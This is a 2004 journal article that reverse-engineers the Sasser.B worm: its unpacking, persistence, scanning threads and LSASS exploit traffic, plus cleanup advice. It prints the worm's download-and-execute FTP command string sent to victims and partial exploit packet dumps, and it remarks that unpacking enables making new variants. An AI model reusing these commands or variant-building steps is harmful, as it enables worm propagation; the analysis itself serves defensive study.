cers (

© The CodeBreakers-Journal, Vol. 1, No. 1 (2004) http://www.CodeBreakers-Journal.com

# VX Reversing II, Sasser.B

Author: Eduardo Labir

#### Abstract

The well known worm Sasser has been one of the viruses which has received more attention in the press in the latest months. It's author, an 18 years old student from Germany, after causing lots of troubles to many home users and small enterprises faces up to several years of prison. Sasser is not a well programmed virus, it's success is entirely due to the exploit it implements, which was announced by Microsoft in one of their security bulletins. In this paper, we will reverse Sasser.B - the second of its variants - showing how it works and also how to clean your computer after infection.

Warning: disconnect your computer from the network while working with Sasser, you are left as the only responsible of your mistakes.

Keywords: Sasser; Virus-Analysis; Worm-Analysis; Viral Exploits

### I. Introduction

If you have read the previous paper on Virus Reversing at CodeBreakers then you have all necessary background to beat Sasser. It's not only surprising, but worrying too, how such a simple virus can spread through all over the internet devastating whole networks and provoking millionaire losses to many enterprises. This stresses, yet again, two evident facts:

- Security in Microsoft needs a serious improvement.
- The Anti-virus companies, once again, are only able to add another string to their string scanners after the damage has been done.

This time, using an (theoretically) outdated exploit was enough to bypass all firewalls and anti-virus products.

Sasser will not be the last i-Worm making trouble, unfortunately there is another "worm of the year" every two or three months, nor this will be the last paper in which you will read this remarks. There is an only way of successfully beating computer viruses, understanding them.

In this paper, we will take a close inspection at Sasser's behaviour, showing how it infects, spreads and how to clean it up from your computer. The article is divided in three parts: first, we unpack the virus, second, we have a look at its imports and strings references, finally, we debug into the virus to examine how it works.

Usually, papers on malware reversing request the use of several very expansive tools. However, following this paper just requires a debugger, anyone one will do (download Olly, which is freeware, from [1]).

#### **II. Unpacking Sasser**

Load Sasser in your debugger:

```
0040283E mov eax,sasserB.0040284D
00402843 add byte ptr [eax],28
00402846 inc eax
```

As you see, this is a small self-modifying code, done to hide the offset of the seh-handler it is going to install in the next instructions:

| 0040284D | mov eax,sasserB.0040980F | ; | offset seh-handler          |
|----------|--------------------------|---|-----------------------------|
| 00402852 | push eax                 | ; | push offset handler         |
| 00402853 | push dword ptr fs:[0]    | ; | push offset current handler |
| 0040285A | mov dword ptr fs:[0],esp | ; | install it                  |

When installed, the packer provokes an exception writing to a non allowed offset:

00402861 xor eax,eax 00402863 mov dword ptr [eax],ecx This calls our handler, so we set a bpx there and pass the exception to Sasser:

```
0040980F mov eax,F04087B0
00409814 lea ecx,dword ptr [eax+10001082]
```

The handler modifies a dword outside it, this is done to ensure the handler has been called. After it you can see that it overwrites the instruction which provoked the exception with a jump, then we continue execution:

```
0040981D mov edx,dword ptr [esp+4] ; take pointer to the exception record
00409821 mov edx,dword ptr [edx+C] ; address where the exception took place
00409824 mov byte ptr [edx],0E9 ; write a jump
...
0040982F xor eax,eax ; continue exception
00409831 retn
```

Now, set a breakpoint on the address where the exception took place (which has been overwritten with a jump, as we mentioned) and let's continue debugging.

Note for Olly users: the seh handler hasn't set the trap flag, having it set to TRUE when reaching the jump it's possibly a bug in Olly, set it to FALSE.

The packer removes the current seh and restores the registers. After it, it takes the address of kernel32.VirtualAlloc from its imports table and reserves memory for unpacking Sasser:

| 0012FF98 | 00409867 | /CALL to VirtualAlloc from sasserB.00409865  |
|----------|----------|----------------------------------------------|
| 0012FF9C | 00000000 | Address = NULL                               |
| 0012FFA0 | 0000095B | Size = 95B (2395.)                           |
| 0012FFA4 | 00001000 | AllocationType = MEM_COMMIT                  |
| 0012FFA8 | 00000040 | <pre>\Protect = PAGE_EXECUTE_READWRITE</pre> |

Now, we are going to take profit to see the APIs the packer has imported. Just go to its Imports Table, at RVA 9024 as given in the PE-header, and you will find the following ones:

kernel32.LoadLibraryA
kernel32.GetProcAddress
kernel32.VirtualAlloc
kernel32.VirtualFree

Of course, the first two are used for importing APIs from any DLL it might need. By other hand, VirtualAlloc and VirtualFree are simply to allocate a buffer, two of them actually, where the packed program will be decrypted.

Observe the parameters of this call:

| 00409881 | push 0   | ; |         |    |                           |
|----------|----------|---|---------|----|---------------------------|
| 00409883 | push eax | ; | 4098CD  | <= | end of code to decrypt    |
| 00409884 | push edi | ; | 370000  | <= | buffer                    |
| 00409885 | push esi | ; | 4090C5  | <= | start of block to decrypt |
| 00409886 | call ecx | ; | decrypt |    |                           |

Note that is evident by far what this routine does (debug into it too, it's easy to see how it works). The next call is this one:

| 004098A7 | push ecx      | ; 901C       |
|----------|---------------|--------------|
| 004098A8 | mov dword ptr | [esi+28],ecx |
| 004098AB | call edi      |              |

What does 901C mean?. If you recall, the imports table was at RVA 9024, so chances are that this is an RVA and, indeed, is so (the value of eax is at this point 8C, which is a common size of small imports table - multiple of the decimal number 20, which is the size of an IMAGE\_IMPORT\_DESCRIPTOR).

901C is the RVA of kernel32.VirtualFree into the IAT of the packed virus. The virus, will examine its import table to retrieve the address of each of its imported APIs (see above). Then, it will decrypt the string "kernel32.dll" and will call LoadLibraryA to get the image base of this DLL. The imports reconstruction has started:

| 00370403 | push | ecx       |                |   |                       |
|----------|------|-----------|----------------|---|-----------------------|
| 00370404 | call | dword ptr | [ebx+1000128F] | ; | kernel32.LoadLibraryA |

As usual, once we have the image base of kernel32 we can start to get the addresses of each one of the APIs (from kernel32) we are interested in. The first we retrieve is ExitProcess:

| 00370426 | push eax                      | ; image base of kernel32,  |
|----------|-------------------------------|----------------------------|
|          |                               | ; returned by LoadLibraryA |
| 00370427 | push dword ptr [ebp-4]        | ; 'ExitProcess',0          |
| 0037042A | call dword ptr [ebx+10001293] | ; kernel32.GetProcAddress  |

Have a look at the instructions immediately after the call to kernel32.GetProcAddress:

| test eax,eax      | ; found?                                                           |
|-------------------|--------------------------------------------------------------------|
| je short 00370448 | ; nope, abort.                                                     |
| stosd             | ; yes, store it                                                    |
| pop edx           | ; restore edx                                                      |
| add edx,4         | ; go to next                                                       |
|                   | test eax,eax<br>je short 00370448<br>stosd<br>pop edx<br>add edx,4 |

Next what?. Edx, as you can see yourself, is the pointer to the IAT. As you know, each imported DLL has a piece of the IAT for itself, there you have a zeroe terminated array of RVAs to the names of the imported APIs.

```
mov eax, dword ptr [edx]
0037041B
                                     ; take RVA
0037041D
           test eax, eax
                                     ; end of the current array?
0037041F
           je short 0037043B
                                     ; yes, next IMAGE IMPORT DESCRIPTOR.
. . .
0037043B
           add esi,0C
                                     ; esi points to the current import descryptor,
                                     ; take the next one
           mov eax,dword ptr [esi]
                                     ; is the OriginalFirstThunk null?,
0037043E
                                     ; if so we have finished,
                                     ; otherwise go to get
                                     ; its apis
00370440
           test eax, eax
00370442
           jnz short 003703FF
```

If there is still another IMAGE\_IMPORT\_DESCRIPTOR to examine then we take its DLL name and call LoadLibraryA (this closes a cycle, we are above at the call to LoadLibraryA). To work, this algorithm needs to have a correct OriginalFirstThunk - not a must-have in the PE-format. This can only be ensured for the packer, meaning the reconstruction of the imports table for the virus will be done later. As you can see, in this the very first pass through the imports reconstruction we have only got kernel32.ExitProcess, user32.MessageBoxA and user32.wsprintfA.

Again, the packer now allocates more memory calling kernel32.VirtualAlloc and starts again to decrypt there. To know what is doing you only have to pay attention on where it writes to, check the value of edi when it does "repne movsb" (points to the allocated buffer).

The routines to unpack are these ones:

| 003701DB | push | esi      |
|----------|------|----------|
| 003701DC | call | 003705B8 |
| 003701E1 | push | esi      |
| 003701E2 | call | 003706C6 |
| 003701E7 | push | esi      |
| 003701E8 | call | 003704B8 |
| 003701ED | push | esi      |
| 003701EE | call | 00370455 |

After them, it starts the imports reconstruction for the virus.

00370201push ecx00370202push esi00370203call 00370746<== import all apis from a single DLL</td>

At this point we are going to have a look at the values pointed by ecx and esi. Esi points inside the buffer, not too relevant, however ecx points to the imports table:

#### (first IMAGE\_IMPORT\_DESCRIPTOR)

00405488 CC 55 00 00 00 00 00 00 00 00 00 00 1C 56 00 00 00405498 E0 50 00 00 00 55 00 00

(extract from the API strings)

| 00405608 |    |    |    |    |    |    |    |    |    |    | 77 | 73 | 70 | 72 | 69 | 6E | wsprin         |
|----------|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----------------|
| 00405618 | 74 | 66 | 41 | 00 | 55 | 53 | 45 | 52 | 33 | 32 | 2E | 64 | 6C | 6C | 00 | 00 | tfA.USER32.dll |
| 00405628 | 00 | 00 | 47 | 65 | 74 | 50 | 72 | 6F | 63 | 41 | 64 | 64 | 72 | 65 | 73 | 73 | GetProcAddress |
| 00405638 | 00 | 00 | 00 | 00 | 4C | 6F | 61 | 64 | 4C | 69 | 62 | 72 | 61 | 72 | 79 | 41 | LoadLibraryA   |
| 00405648 | 00 | 00 | 00 | 00 | 6C | 73 | 74 | 72 | 63 | 70 | 79 | 41 | 00 | 00 | 00 |    | lstrcpyA       |

As you can see, the imports table is totally correct, therefore you only have to save it for later. This is quite a lame imports protection. We will not enter into details about the imports reconstruction, the algorithm is pretty similar to the one above but taking in account imports by ordinal and other minor stuff.

After reconstructing the imports both buffers are freed (by means of kernel32.VirtualFree) and, finally, the packer jumps to the entry point of the virus, once all registers have been restored:

| 004098C5 | pop esi |            |                                                          |
|----------|---------|------------|----------------------------------------------------------|
| 004098C6 | pop edx |            |                                                          |
| 004098C7 | pop edi |            |                                                          |
| 004098C8 | pop ecx |            |                                                          |
| 004098C9 | pop ebx |            |                                                          |
| 004098CA | pop ebp |            |                                                          |
| 004098CB | jmp eax | ; 40283E = | <pre>sasserB.<moduleentrypoint></moduleentrypoint></pre> |

As an application, let's give a small recipe for unpacking the virus:

- Set a bpx on kernel32.VirtualAlloc, run the packer twice.
- Go to 00370203 (this point can differ in your machine, take 0203 + image base of your buffer, which is available when you call VirtuallAlloc) and set a bpx there, run the packer.
- Go the the memory pointed by ecx, the imports table, and cut it.
- Remove the bpx at 00370203 (same comment than above) set a new one at the Entry Point and run again the packer.
- Dump, divert the entry point (not needed, the packer preserves the entry point) and paste the imports table. Set the imports table (at the PE-header) to RVA =5488 and size = 64h. 6. Set FirstThunk = OriginalFirstThunk at all the IMAGE\_IMPORT\_DESCRIPTORS (note that the FirstThunk has been deleted by the packer, however, having the intact OriginalFirstThunk suffices).

That's all, unpack it yourself so you can see a clean copy of the virus.

For sure, you have heard about different modifications of the original virus. Being able to unpack it also means being able to produce your own variant by injecting some code. When done, you have to take the packer and protect the virus again.

#### III. Wellcome to Sasser.B

We are at the entry point of Sasser:

0040283E push ebp 0040283F mov ebp,esp 00402841 push -1 00402843 push sasserB.00405128

In this section, we are going to have a look at the internals of Sasser, let's start by extracting some of the the string references:

The next, is the standard registry key where you have to add yourself for running on startup:

Software\Microsoft\Current Version\Run

FTP commands:

USER, PASS, PORT, QUIT

Another command (to send to the victims):

```
ASCII "echo off&echo open \% s 5554>>cmd.ftp&echo anonymous>>
cmd.ftp&echo user&echo bin>>cmd.ftp&echo get \%i_up.exe>>cmd.ftp&echo bye
>>cmd.ftp&echo on&ftp -s:cmd.ftp&\%i_up.exe&echo off&del cmd.ftp&echo on",LF
```

The virus copies itself under this name:

avserve.exe

Return codes for the FTP-like protocol:

220 OK,...

Apart from this strings one has also those ones corresponding to the imported APIs, this is what we examine next. Let's make a summary of the most relevant imported APIs and their (common) use in virus writing:

### From kernel32:

- 1) CopyFileA worms use to copy themselves inside the windows directory.
- 2) **CreateMutexA** prevents from running several instances of the worm in the same computer, this is done by creating a named mutex object (the second call will fail with a particular error code that you must check).
- 3) **CreateThread** multi-threaded applications are harder for Anti-Viruses. By other hand, worms use to create a thread in charge of searching for new hosts, this way the user doesn't notice any delay.
- 4) **GetCommandLineA** if the virus copies itself to, for example, the Windows Directory then it shall need a way to know where it has been run from. Calling GetCommandLineA and comparing the beginning of the returned string with the path to the Windows Directory solves this.
- 5) **GetEnvironmentStrings** some interesting information is returned here, for example the (mentioned) Windows Directory.
- 6) GetModuleFileName path to the current process or to some (loaded) module.
- 7) **LoadLibraryA, GetProcAddress** get the address of any API. Note: set always a breakpoint on GetProcAddress, otherwise you may miss lots of calls.
- 8) GetTickCount random number generation.
- 9) GetVersion the worm only works under WinNT based systems.
- 10) GetWindowsDirectory other interesting one is GetSystemDirectory.
- 11) **Icreat, lopen,...** obsolete procedures to handle files, the virus takes this ones to avoid the common Create-FileA.
- 12) **WinExec** to run another instance of itself. Usually, WinExec is called passing a particular command line in anti-debug tricks.
- 13) WriteFile again, avoiding the common method to handle files (which is through a file mapping).

## From user32:

1) **wsprintfA** to format strings.

## From advapi32:

- 1) **AbortSystemShutdown** the user will surely notice that the virus is running (this virus is not stealth at all), if he tries to shutdown the computer this will stop it.
- 2) **RegOpenKeyA, RegSetValueExA, RegCloseKey** write a new entry on the registry to achieve per-session residency. There are several possible keys to alter, the one used by this virus is too obvious.

From Winsock (actually from ws2\_32, but is enough to link with Winsock ). Wsock32.dll is the DLL used for network communication, you will need some background on the field to understand this article:

- 1) WSAStartup initialises winsock (gets the Winsock version installed in the current machine).
- 2) **socket** create a socket
- 3) connect connects your socket to a server on a given port.
- 4) gethostname get the name of the current machine.
- 5) gethostbyname get the IP of a machine given its name.
- 6) **bind** bind to a port and accept connections there.
- 7) **accept** accepts connection on a socket
- 8) inet\_addr converts a string having an IP, for example 127.0.0.1, into an in\_addr structure.
- 9) listen makes a socket to await for connections.
- 10) send, recv send and receive bytes from a connected socket.

This completes our preliminary description of the worm. Now, we are ready to study it in detail.

### **IV. Debugging Sasser**

This part of the article is divided into three. The first, examines how Sasser infects the local machine, this is simply achieved by coping itself to the WINDOWS directory and modifying the registry to ensure to be run on each OS startup. The second, shows how the virus looks for new possible hosts and how it connects to them and tries to exploit a vulnerability in one of the Windows Services, LSASS.exe. The third and last examines the serve-like behaviour of the virus, which is able to respond to a very basic FTP-like session.

#### A. Infecting the current system

Since the virus has been coded in Visual C++ it has the standard useless calls automatically inserted by compilers to easy up the non-programmer's work.

Of course, we don't need at all to debug step by step into a Visual C++ application, instead we will simply hook all those APIs we consider dangerous (the ones we listed above). In case you prefer the lengthy, and useless, way you will see calls to retrieve the command line, the stdin/stdout/stderr consoles,... and other meaningless calls before you reach the relevant ones. You will see the following calls:

- 1) GetVersion OS version, the virus is not Win9x compatible
- 2) HeapCreate creates a block of memory
- 3) RtlAllocateHeap called twice, allocates memory
- 4) VirtualAlloc called twice, allocates memory
- 5) GetStartupInfo some info about the GUI of the program and stuff
- 6) GetStdHandle retrieves the stdin, stdout and stderr consoles.
- 7) **SetHandleCount** this call has no effect under WinNT
- 8) GetCommandLineA get the command line
- 9) GetStartupInfoA information about how this application was created
- 10) GetEnvironmentStrings some paths and stuff
- 11) WideCharToMultiByte string conversions
- 12) FreeEnvironmentStringsW free the memory for this strings
- 13) GetCPInfo information about a memory area: writable, size,...

Next, there are several calls to play with some strings retrieved above. Finally, this ones:

- 1) GetModuleFileNameA path to the current program
- 2) GetStartupInfoA more useless information, for example the stdin, stdout, stderr consoles (again).
- 3) GetModuleHandleA get the image base of the current program.

In summary, the virus (apart from getting the information automatically given by Visual C++) has retrieved the path to the current file. Now we, finally, start the viric activity:

00402038push sasser\_d.00406A94; ASCII "Jobaka3"0040203Dpush esi; NULL0040203Epush esi; NULL0040203Fcall edi; kernel32.CreateMutexA

The virus has created a named mutex called 'jobaka3', this is done to prevent several instances of the virus running on the same machine (a widely used technique). The virus initialises now its random number generator calling GetTickCount and, next, it starts Winsock calling WSAStartup. WSAStartup retrieves the current version of Winsock installed in the OS and fills an important structure you need to start interneting with your virus, therefore is always the first network-oriented call. The initialisation required by the virus is now complete, note this has consisted of the following three steps:

- Create a mutex to avoid multiple infection of a single machine.
- Initialize the random number generator calling GetTickCount.
- Initialize Winsock calling WSAStartup.

All worms, this is not an exception, try to ensure they will be run when the system reboots. There are many ways of achieving per-session residence, once of the most widely used (and so less interesting) is the one chosen by Sasser:

; First, we get the path to the current file

004020EE push 0 004020F0 call dword ptr [KERNEL32.GetModuleFileNameA]

; Next, we get the path to the windows directory (usually C:\WINNT or C:\WINDOWS)

004020FE call dword ptr [KERNEL32.GetWindowsDirectoryA]

At this point, you will see how it constructs the string "C:\ WINDOWS\ avserve2.exe" and, as you can well imagine, it copies itself there:

```
0040214F push 0 ; fail if exists = FALSE
00402151 push eax ; new name: "C:\WINDOWS\avserve2.exe"
00402152 lea eax,dword ptr [ebp-824]
00402158 push eax ; old name: "C:\LameVirii\sasserB.exe"
00402159 call dword ptr [KERNEL32.CopyFileA]
```

Once the virus has copied itself to a safe place (note: the Windows directory is probably one of the worst, every sysadmin checks for changes there) it proceeds to add itself to the following registry key: Software\Microsoft\Current Version\Run. All programs included in this key are run on startup by Windows. Needless to say, there are many other ways to hide your virus to ensure it shall be run on startup, the one chosen by the author of Sasser is probably the most evident. To add a value to the registry you have to first open the key, advapi32.RegOpenKey, and then set it with advapi32.RegSetValueExA:

| 00402162     | push | eax        |             | ;     | address for receiving the handle |
|--------------|------|------------|-------------|-------|----------------------------------|
| 00402163     | push | sasser_d.0 | 0406A9C     | ;     | "SOFTWARE\Microsoft\Windows      |
|              |      |            |             | ;     | CurrentVersion\Run"              |
| 00402168     | push | 80000002   |             | ;     | HKEY_LOCAL_MACHINE               |
| 0040216D     | call | dword ptr  | [ADVAPI32.R | legOp | DpenKeyA]                        |
| <br>00402195 | call | dword ptr  | [ADVAPI32.R | legSe | SetValueExA] ; adds avserve2.exe |

After this, the virus closes the key. Now, you can go to regedit and check that the new entry has been added, remove it (and remove the copy of the virus at your Windows Directory, as well). Once the virus makes sure that it shall be run on every re-booting of your machine it creates a new mutex, called "JumpallsNlsTillt". If the call returns ERROR\_ALREADY\_EXISTS, 0B7h, the virus exits. Otherwise, the network infection starts.

#### **B.** Searching vulnerable hosts

At this point, Sasser has ensured it shall be run on every session. Let's see how it spreads through the internet. After checking that the mutex "JumpallsNlsTillt" is not present in the system the virus will create lots of copies of the same thread in charge of searching for new hosts and infecting them. Each thread will generate a random IP and will try to connect there on an specific port, if the port is available the target might be exploitable. You can see that there are two consecutive calls to CreateThread. The first thread is the server part of the virus, which shall be examined later in the article, the second is the one that looks for new hosts. For now, we will concentrate on the later. It's also interesting to see that the second thread is created 128 times, this means that the virus searches 128 possible IPs in parallel. However, this considerably slows down the connection and makes the presence of the virus pretty evident:

| 004020AB<br>004020B0 | mov ebx,80<br>/lea eax,dword ptr [ebp-8] |                                       |
|----------------------|------------------------------------------|---------------------------------------|
| <br>004020B6         | push sasser_d.00401EF0                   | ;  ThreadFunction = sasser_d.00401EFC |
| <br>004020BD         | call edi                                 | ; \CreateThread                       |
| 004020BF             | dec ebx                                  |                                       |
| 004020C0             | <pre>\jnz short sasser_d.004020B0</pre>  | ; run this thread another time        |

Before to examine these two threads let's follow a bit more the code we have below, there is an interesting loop:

| 004020C3 | push esi                                         | ; | /MachineName          |
|----------|--------------------------------------------------|---|-----------------------|
| 004020C4 | call dword ptr [<&ADVAPI32.AbortSystemShutdownA> | ; | \AbortSystemShutdownA |
| 004020CA | push OBB8                                        | ; | /Timeout = 3000. ms   |
| 004020CF | call dword ptr [<&KERNEL32.Sleep>]               | ; | \Sleep                |
| 004020D5 | jmp short sasser_d.004020C3                      |   |                       |

Possibly, the author of the virus saw that so many threads dealing with network connections were going to be noticed by the user (it slows down the machine too much). Then, the user would probably try to re-boot his machine and this would stop the virus activity. The loop above is in charge of fixing up this situation, Advapi32.AbortSystemShutdownA will cancel every trial of re-booting. As you see, this call is done every 3 seconds. Of course, one can simply go to the TaskManager and kill the worm... this is supposed to be too difficult for the average user, who doesn't know which processes are running on his machine.

Hands on, let's examine the thread which is created 128 times (we will denote it by 128-thread):

Nop out the creation of the previous thread, we will be back to it later, and let's create the 128-thread. The entry point of the thread is at 401EF0, see the parameters passed to kernel32.CreateThread, where we are going to set our bpx. Apart from this breakpoint we will overwrite the instruction next to the call to kernel32.CreateThread with an infinite loop, this way we ensure that only our thread will be run (in more complicated multi-thread applications this is impossible).

004020BD call edi ; \CreateThread 004020BF jmp short sasser\_d.004020BF ; this is your jump ...

So we are prompted at the entry point of the 128-thread:

00401EF0 sub esp,454 00401EF6 push ebx 00401EF7 push ebp

Now, we debug to see what it does. First of all, the virus get the name of the current host., the name will be used later to get its IP.

| 004010E4 | push OFF                       | ; /BufSize = FF (255.) |
|----------|--------------------------------|------------------------|
| 004010E9 | push eax                       | ;  Buffer              |
| 004010EA | call dword ptr [<&WS2_32.#57>] | ; \gethostname         |

In my case, this name is "myPC", which is returned at the buffer. Now, as we mentioned above, the virus can get the IP of the current machine:

004010FA push eax ; /Name 004010FB call dword ptr [<&WS2\_32.#52>] ; \gethostbyname

This API returns a pointer to the IP of the host, which has to be converted to the usual format (for example, "155.21.21.128"), Windows provides APIs for conversions to the different formats:

```
00401113 push dword ptr [eax] ; push 0100007Fh
00401115 call dword ptr [<&WS2_32.#12>] ; WS2_32.inet_ntoa
```

Now, you will see that the API returns into eax a pointer to the string "127.0.0.1", which is the IP i have now (because i am NOT connected to the internet, never be connected when debugging a worm!).

The virus is going to randomly generate IPs and to try to connect them, note that this is a complete loss of time and, indeed, makes this worm much less dangerous than it could be. However, IP enumeration has been a standard mistake in many i-Worms.

Below this, you will see 12 calls to the same procedure. Them all, are in charge of randomising each part of the current IP. Normally, given a valid IP, say XXX.YYY.ZZZ.TTT one would try to take nodes in the same sub-net, this has more probability of success.

00401F6A push edx 00401F6B call sasser\_d.00401000 ; randomise

12

. . .

Once the new IP has been got the virus transforms it into the standard format with the help of user32.wsprintfA:

```
00401FBDpush edx00401FC2push sasser_d.00406A54 ; ASCII "\%i.\%i.\%i.\%i"00401FC7push eax00401FC8call ebp;USER32.wsprintfA
```

Apart from the IP you want to connect to you also need the port. Normally, when an exploit is found this requires connecting to a given port where a service is listening (for example, this could be the FTP service, at port 21 or the TELNET service, at port 23). The next call converts an hexadecimal value to the standard format for ports, we will try to connect to port 445:

00401171 push 1BD ; /NetShort = 1BD 00401176 call dword ptr [<&WS2\_32.#9>] ; \ntohs

When you have the IP, port included, in a valid format you have to create a socket and to connect it to that IP at the chosen port:

```
004011A3 call dword ptr [<&WS2_32.#23>] ; WS2_32.socket,
; create a socket
; (receives a handle to it)
```

The virus creates a standard SOCK\_STREAM socket for TCP/IP connection through the internet. Different protocols need different kinds of sockets, SOCK\_STREAM is the most commonly used. Let's connect the virus to the host:

| 004011B7 | push 10                       | ; / | /AddrLen = 10 (16.)       |
|----------|-------------------------------|-----|---------------------------|
| 004011B9 | push eax                      | ;   | pSockAddr = 127.65.85.211 |
| 004011BA | push esi                      | ;   | handle to the Socket      |
| 004011BB | call dword ptr [<&WS2_32.#4>] | ; \ | connect                   |

Of course, since we are not connected, the call is going to fail and will return a -1. Change it to 0, which is the success code and let's continue with the analysis:

```
        004011C8
        push esi
        ; /Socket = 100

        004011C9
        call dword ptr [<&WS2_32.#3>]
        ; \closesocket
```

So, the socket is closed (which is a loss of time) and we continue looking for more hosts. First we get the path to the current file:

00401FE6 push 0 ; |hModule = NULL 00401FE8 call dword ptr [<&KERNEL32.GetModuleFileNameA>] ; \GetModuleFileNameA Next, after working a bit with this path and with the IP we found above, we start another instance of this application (calling kernel32.WinExec) passing as command line the path to the virus concatenated to the IP. The current instance continues looking for more hosts.

#### New Created instances of this virus with an IP as command line

As we have seen above, when a possible new host is found the virus calls WinExec to run itself with command line a given IP, let's do it ourselves passing an easy to distinguish IP, for example, "111.11.11.11.11.11.11" to see what this new instance does. Of course, we're going to start this new instance with our debugger.

Set a bpx on all APIs and run the virus. Everything goes on as we saw above until we reach the call to kernel32.GetLastError. If you recall, we commented above that the mutex was created to mark that another instance of this same process is running, kernel32.GetLastError returns ERROR\_ALREADY\_EXISTS in this case and, then, the virus exits. This, of course, means that this has to be done after the other instance of the virus has been terminated, there we go. After creating the named mutex the virus stores the input IP address in another buffer (you will see a call to kernel32.lstrcpyA and another one to user32.wsprintfA). This is followed by the decryption of some of the buffers containing the data for exploiting the vulnerability into LSASS.exe, a service you will see running in your computer at the TASK MANAGER. As we saw in the previous section of this article we have passed as the IP address of the target the string "111.11.11.11". The virus needs this IP to connect to it, the IP of a host given its name is returned by WS2\_32.gethostbyname:

0040147D push dword ptr [ebp+8] ; push offset "111.11.11.11" 00401480 call dword ptr [<&WS2\_32.#52>] ; WS2\_32.gethostbyname

Since we are not connected to the Internet, change the string "111.11.11.11" by your not-connected IP "127.0.0.1" and do the call (after the call, restore the string just in case the virus makes use of it later). This way, the call retrieves a valid information. Next, you will see that it creates a socket and connects it to port 445 at the given IP (have a look at the structure pointed by pSockAddr on the call to WS2\_32.connect). As above, the call fails because we are not connected, not a big deal, change the return to 0 (we could open this port ourselves and connect to it then, however there is no need of complicating this any longer). Once the virus is connected it starts sending and receiving information, this is always done with the APIs WS2\_32.send and WS2\_32.recv (which will always fail, change the return to the number of sent/received bytes respectively):

| 004014FA | push esi                          |               |
|----------|-----------------------------------|---------------|
| 004014FB | call ebx                          | ; WS2_32.send |
|          |                                   |               |
| 00401511 | mov esi,dword ptr [<&WS2_32.#16>] | ; WS2_32.recv |
| 00401517 | call esi                          |               |
|          |                                   |               |

Let's see what it sends. You only have to see the parameteres at the calls, in case of calling WS2\_32.send one of them is a buffer with the sent data and another one its length (WS2\_32.recv is also pretty easy, check win32.hlp for a detailed description of the APIs).

Copyright © 2004 and published by the CodeBreakers-Journal. Single print or electronic copies for personal use only are permitted. Reproduction and distribution without permission is prohibited.

sent (change the return to 89h after the call, you would have this value if the call would succeed):

| 004061CC | 00 | 00 | 00 | 85 | $\mathbf{FF}$ | 53 | 4D | 42 | 72 | 00 | 00 | 00 | 00 | 18 | 53            | C8 | ÿSMBrXSÈ         |
|----------|----|----|----|----|---------------|----|----|----|----|----|----|----|----|----|---------------|----|------------------|
| 004061DC | 00 | 00 | 00 | 00 | 00            | 00 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | $\mathbf{FF}$ | FE | ÿ                |
| 004061EC | 00 | 00 | 00 | 00 | 00            | 62 | 00 | 02 | 50 | 43 | 20 | 4E | 45 | 54 | 57            | 4F | b.BPC NETWO      |
| 004061FC | 52 | 4B | 20 | 50 | 52            | 4F | 47 | 52 | 41 | 4D | 20 | 31 | 2E | 30 | 00            | 02 | RK PROGRAM 1.0.B |
|          |    |    |    |    |               |    |    |    |    |    |    |    |    |    |               |    |                  |

Now, the virus calls WS2\_32.recv with a buffer size of 640h bytes. The virus does not process the received bytes - you always have to receive the bytes from the server before to send more because all protocols send acknowledgments and stuff - and calls again WS2\_32.send. This time we sent 0A8h bytes:

sent (0A8 bytes)

| 00406258 | 00 | 00 | 00 | A4 | $\mathbf{FF}$ | 53            | 4D | 42 | 73 | 00 | 00 | 00 | 00 | 18 | 07            | C8 | ÿSMBsXGÈ |
|----------|----|----|----|----|---------------|---------------|----|----|----|----|----|----|----|----|---------------|----|----------|
| 00406268 | 00 | 00 | 00 | 00 | 00            | 00            | 00 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | $\mathbf{FF}$ | FΕ | ÿ        |
| 00406278 | 00 | 00 | 10 | 00 | 0 C           | $\mathbf{FF}$ | 00 | A4 | 00 | 04 | 11 | 0A | 00 | 00 | 00            | 00 | PÿDQ     |
|          |    |    |    |    |               |               |    |    |    |    |    |    |    |    |               |    |          |

Again, the virus receives more data, with a call to WS2\_32.recv, but does nothing to them... More bytes sent (size 0DEh)...

sent (0DE bytes)

| 00406304 | 00 | 00 | 00 | DA | $\mathbf{FF}$ | 53 | 4D | 42 | 73 | 00 | 00 | 00 | 00 | 18 | 07            | C8 | ÚÿSMBsXGÈ                          |
|----------|----|----|----|----|---------------|----|----|----|----|----|----|----|----|----|---------------|----|------------------------------------|
| 00406314 | 00 | 00 | 00 | 00 | 00            | 00 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | 00 | $\mathbf{FF}$ | FΕ | ÿ                                  |
| 00406324 | 00 | 08 | 20 | 00 | 0 C           | FF | 00 | DA | 00 | 04 | 11 | 0A | 00 | 00 | 00            | 00 | .Hÿ.Ú.DQ                           |
| 00406334 | 00 | 00 | 00 | 57 | 00            | 00 | 00 | 00 | 00 | D4 | 00 | 00 | 80 | 9F | 00            | 4E | $\dots$ W $\dots$ $\hat{O}\dots$ N |
|          |    |    |    |    |               |    |    |    |    |    |    |    |    |    |               |    |                                    |

Immediately after this, it starts some heavy string manipulation. Among other things, it includes the IP we have passed to it at the command line inside some buffers. For example, see the following extract, got just before running the call at 4015FB:

 0012FE2C
 4C 4D 4E 4F 1E 28 F4 77 5C 5C 31 31 31 2E 31 31 LMNO.(ôw\\111.11

 0012FE3C
 2E 31 31 2E 31 31 31 5C 69 70 63 24 00 2E 31 31 .11.111\ipc\$..11

 0012FE4C
 2E 31 31 2E 31 31 31 5C 69 70 63 24 00 .11.111\ipc\$.

Once this string manipulation has concluded the virus prepares to connect to port 9996. Presumably, the vulnerability has opened this port and so the virus is able to connect there. We will not enter in details at this point, at the end, this is a exploit and could still be profitable for some systems. Therefore, we simply assume that the virus has prepared the code to be run in the remote host. When done, the virus creates a socket:

004017F2 push 2 004017F4 call dword ptr [<&WS2\_32.#23>] ; WS2\_32.socket

And connects again to port 445. Again, all the buffers we have seen above are sent but (meaning the previous time the virus was only checking if this host was exploitable), this time, there is an additional one (which has been created in the omitted calls) which contains the following:

| 0012FDBC | 00 | 00 | 00 | 5C | FF | 53 | 4D | 42 | 75 | 00 | 00 | 00 | 00 | 18 | 07 | C8 | \ÿSMBuXGÈ          |
|----------|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|--------------------|
| • • •    |    |    |    |    |    |    |    |    |    |    |    |    |    |    |    |    |                    |
| 0012FDEC | 5C | 00 | 5C | 00 | 31 | 00 | 31 | 00 | 31 | 00 | 2E | 00 | 31 | 00 | 31 | 00 | $\.\.1.1.1.1.1.1.$ |
| 0012FDFC | 2E | 00 | 31 | 00 | 31 | 00 | 2E | 00 | 31 | 00 | 31 | 00 | 31 | 00 | 5C | 00 | 1.11.1.1.          |
